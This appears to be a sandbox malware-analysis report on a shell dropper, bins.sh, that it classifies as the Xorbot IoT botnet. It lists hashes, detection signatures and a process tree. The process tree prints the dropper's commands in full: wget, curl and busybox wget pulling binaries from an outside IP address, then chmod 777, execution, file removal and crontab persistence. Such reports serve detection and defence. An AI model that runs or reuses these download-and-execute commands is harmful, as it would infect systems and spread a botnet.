Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    123s
  • max time network
    151s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240729-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    12/12/2024, 00:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    1d5b2a7b3af160b4a8d62dfc4ec1d359

  • SHA1

    c6a95cbf4750484d23d78b71d1d1065a210301b6

  • SHA256

    680092c14ddc788945c049ce9ef06ebb24af47c502a738d044c09260dd771643

  • SHA512

    47c3c36c80d2fb44bf0e5852ea583f051f8d4c1792b2d8057add8e575fb91ae7cf37c53f3a4af5bc8b20ab10f9a26107928cf8b6e0866ac5e4fd7e11c9e90821

  • SSDEEP

    192:dvicIR9EQZ4QZQ3XjuTjnwEQZ4QxrXjuTj8cIH:dvicIR9EQZ4QZQ3XjuTjwEQZ4QtXjuTC

Score
10/10
xorbotbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalatiotrojan

Malware Config

Signatures

  • Detects Xorbot 5 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • Contacts a large (2137) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 5 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 15 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:1527
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:1528
        • /usr/bin/wget
          wget http://37.44.238.68/bins/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          2⤵
          • Writes file to tmp directory
          PID:1529
        • /usr/bin/curl
          curl -O http://37.44.238.68/bins/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          2⤵
          • Writes file to tmp directory
          PID:1534
        • /bin/busybox
          /bin/busybox wget http://37.44.238.68/bins/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          2⤵
          • Writes file to tmp directory
          PID:1535
        • /bin/chmod
          chmod 777 woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          2⤵
          • File and Directory Permissions Modification
          PID:1536
        • /tmp/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          ./woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          2⤵
          • Executes dropped EXE
          PID:1537
        • /bin/rm
          rm woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          2⤵
            PID:1539
          • /usr/bin/wget
            wget http://37.44.238.68/bins/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            2⤵
            • Writes file to tmp directory
            PID:1540
          • /usr/bin/curl
            curl -O http://37.44.238.68/bins/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            2⤵
            • Writes file to tmp directory
            PID:1541
          • /bin/busybox
            /bin/busybox wget http://37.44.238.68/bins/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            2⤵
            • Writes file to tmp directory
            PID:1542
          • /bin/chmod
            chmod 777 ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            2⤵
            • File and Directory Permissions Modification
            PID:1543
          • /tmp/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            ./ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            2⤵
            • Executes dropped EXE
            PID:1544
          • /bin/rm
            rm ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            2⤵
              PID:1546
            • /usr/bin/wget
              wget http://37.44.238.68/bins/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              2⤵
              • Writes file to tmp directory
              PID:1547
            • /usr/bin/curl
              curl -O http://37.44.238.68/bins/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              2⤵
              • Writes file to tmp directory
              PID:1548
            • /bin/busybox
              /bin/busybox wget http://37.44.238.68/bins/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              2⤵
              • Writes file to tmp directory
              PID:1549
            • /bin/chmod
              chmod 777 zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              2⤵
              • File and Directory Permissions Modification
              PID:1550
            • /tmp/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              ./zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              2⤵
              • Executes dropped EXE
              PID:1551
            • /bin/rm
              rm zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              2⤵
                PID:1553
              • /usr/bin/wget
                wget http://37.44.238.68/bins/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                2⤵
                • Writes file to tmp directory
                PID:1554
              • /usr/bin/curl
                curl -O http://37.44.238.68/bins/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                2⤵
                • Writes file to tmp directory
                PID:1555
              • /bin/busybox
                /bin/busybox wget http://37.44.238.68/bins/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                2⤵
                • Writes file to tmp directory
                PID:1556
              • /bin/chmod
                chmod 777 a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                2⤵
                • File and Directory Permissions Modification
                PID:1557
              • /tmp/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                ./a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                2⤵
                • Executes dropped EXE
                PID:1558
              • /bin/rm
                rm a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                2⤵
                  PID:1560
                • /usr/bin/wget
                  wget http://37.44.238.68/bins/E16KuOPcUiplct7MpSkszujHELGuWSszA2
                  2⤵
                  • System Network Configuration Discovery
                  • Writes file to tmp directory
                  PID:1561
                • /usr/bin/curl
                  curl -O http://37.44.238.68/bins/E16KuOPcUiplct7MpSkszujHELGuWSszA2
                  2⤵
                  • System Network Configuration Discovery
                  • Writes file to tmp directory
                  PID:1562
                • /bin/busybox
                  /bin/busybox wget http://37.44.238.68/bins/E16KuOPcUiplct7MpSkszujHELGuWSszA2
                  2⤵
                  • System Network Configuration Discovery
                  • Writes file to tmp directory
                  PID:1563
                • /bin/chmod
                  chmod 777 E16KuOPcUiplct7MpSkszujHELGuWSszA2
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1564
                • /tmp/E16KuOPcUiplct7MpSkszujHELGuWSszA2
                  ./E16KuOPcUiplct7MpSkszujHELGuWSszA2
                  2⤵
                  • Executes dropped EXE
                  • Renames itself
                  • Reads runtime system information
                  • System Network Configuration Discovery
                  PID:1565
                  • /bin/sh
                    sh -c "crontab -l"
                    3⤵
                      PID:1567
                      • /usr/bin/crontab
                        crontab -l
                        4⤵
                          PID:1568
                      • /bin/sh
                        sh -c "crontab -"
                        3⤵
                          PID:1569
                          • /usr/bin/crontab
                            crontab -
                            4⤵
                            • Creates/modifies Cron job
                            PID:1570
                      • /bin/rm
                        rm E16KuOPcUiplct7MpSkszujHELGuWSszA2
                        2⤵
                        • System Network Configuration Discovery
                        PID:1572
                      • /usr/bin/wget
                        wget http://37.44.238.68/bins/wBQq9SauqB5qBpNrsdtctSpVqNxtXMP5nT
                        2⤵
                          PID:1575

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /tmp/E16KuOPcUiplct7MpSkszujHELGuWSszA2
                        Filesize

                        98KB

                        MD5

                        5141342d0df8699fa32a6b066a0c592e

                        SHA1

                        8157673225bd5182f16215e2aa823a25ca2d4fbc

                        SHA256

                        54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

                        SHA512

                        d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

                        Download Submit

                      • /tmp/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                        Filesize

                        107KB

                        MD5

                        eb9c3a0de91fcf16ba17cb24608df68c

                        SHA1

                        09d95a7d70d5e115d103be51edff7c498d272fac

                        SHA256

                        dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

                        SHA512

                        9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

                        Download Submit

                      • /tmp/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
                        Filesize

                        141KB

                        MD5

                        3ca8decdb1e52c423c521bfff02ac200

                        SHA1

                        8621ecd6807109b8541912ad9e134f6fb49bfd48

                        SHA256

                        dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

                        SHA512

                        b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

                        Download Submit

                      • /tmp/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
                        Filesize

                        119KB

                        MD5

                        1b166b95f9cb4b079ef1b9ec8363ddf3

                        SHA1

                        0d8eb08add467b3b5474f9b25909297fe7c2839c

                        SHA256

                        94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

                        SHA512

                        983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

                        Download Submit

                      • /tmp/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
                        Filesize

                        122KB

                        MD5

                        cd3d4b9c643e5b473fb4d88ed05f0716

                        SHA1

                        64ee7a97418583d759eaea8000890cc3bae1b5f4

                        SHA256

                        0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

                        SHA512

                        164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

                        Download Submit

                      • /var/spool/cron/crontabs/tmp.a4DtA4
                        Filesize

                        210B

                        MD5

                        7c22dff036763f6ea660fc3c9305b1a1

                        SHA1

                        711b6dcdb47dbb368c1e72843034efe1ff348b49

                        SHA256

                        53c12be9df35b7530def58802d7a1925ebb1396ea4c832090d6a53ddf7d9336a

                        SHA512

                        2a91f61cd61c7641afa8ca0c7669f26268174120cc33f7c59cfd2cfe6f09c40d3f52c851d625c57f5a42b2749b22bd6eebad77917e0e3ffcd989a4a39470901d

                        Download Submit